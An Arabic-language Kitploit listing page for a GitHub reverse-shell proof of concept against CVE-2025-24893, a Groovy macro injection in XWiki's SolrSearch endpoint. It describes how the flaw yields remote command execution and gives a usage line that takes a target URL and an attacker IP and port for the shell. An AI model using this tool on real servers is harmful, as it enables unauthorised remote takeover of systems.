Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24893-Reverse-Shell — حمولة شل عكسية لـ CVE-2025-24893 | Kitploit
أدوات/GitHubGitHub/azureadtrent/cve-2025-24893-reverse-shell
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubazureadtrent/cve-2025-24893-reverse-shell

CVE-2025-24893-Reverse-Shell

حمولة شل عكسية لـ CVE-2025-24893

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-24893 - استغلال تنفيذ التعليمات البرمجية عن بُعد في XWiki

إثبات المفهوم لـ CVE-2025-24893 – ماكرو <groovy> تنفيذ التعليمات البرمجية عن بُعد في XWiki
مستوحى من إثبات المفهوم الأصلي لـ Artemir


الوصف

هذا استغلال إثبات مفهوم (PoC) لـ CVE-2025-24893، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في إصدارات معرضة للخطر من XWiki.

يكمن العيب في عدم تعقيم إدخال المستخدم بشكل صحيح داخل نقطة نهاية SolrSearch، والتي تكون عرضة لحقن ماكرو <groovy> غير محمي عبر استعلام تغذية RSS.

يقوم هذا النص البرمجي بحقن حمولة Groovy باستخدام ماكرو async مما يؤدي إلى تنفيذ الأوامر على الخادم، مما يسمح للمهاجم بتشغيل قشرة عكسية تعود إلى نظامه.


الاستخدام

root@kitploit:~
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>
تنزيل الأداة